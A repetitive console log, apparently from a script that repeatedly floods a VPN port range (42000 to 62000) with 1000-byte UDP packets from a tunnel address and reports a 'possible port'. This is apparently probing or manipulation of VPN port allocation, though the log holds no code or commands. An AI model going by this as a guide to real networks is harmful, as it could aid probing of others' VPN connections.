+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:30:06 +Starting port fill at 2020-09-06 09:31:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:31:07 +Starting port fill at 2020-09-06 09:32:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 09:32:07 +Starting port fill at 2020-09-06 09:33:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 09:33:07 +Starting port fill at 2020-09-06 09:34:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:34:05 +Starting port fill at 2020-09-06 09:35:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 09:35:06 +Starting port fill at 2020-09-06 09:36:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:36:04 +Starting port fill at 2020-09-06 09:37:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:37:06 +Starting port fill at 2020-09-06 09:38:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:38:05 +Starting port fill at 2020-09-06 09:39:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:39:05 +Starting port fill at 2020-09-06 09:40:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:40:04 +Starting port fill at 2020-09-06 09:41:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:41:05 +Starting port fill at 2020-09-06 09:42:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:42:06 +Starting port fill at 2020-09-06 09:43:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:43:06 +Starting port fill at 2020-09-06 09:44:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:44:04 +Starting port fill at 2020-09-06 09:45:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:45:04 +Starting port fill at 2020-09-06 09:46:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:46:04 +Starting port fill at 2020-09-06 09:47:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:47:05 +Starting port fill at 2020-09-06 09:48:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:48:07 +Starting port fill at 2020-09-06 09:49:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:49:05 +Starting port fill at 2020-09-06 09:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:50:05 +Starting port fill at 2020-09-06 09:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:51:05 +Starting port fill at 2020-09-06 09:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:52:05 +Starting port fill at 2020-09-06 09:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:53:05 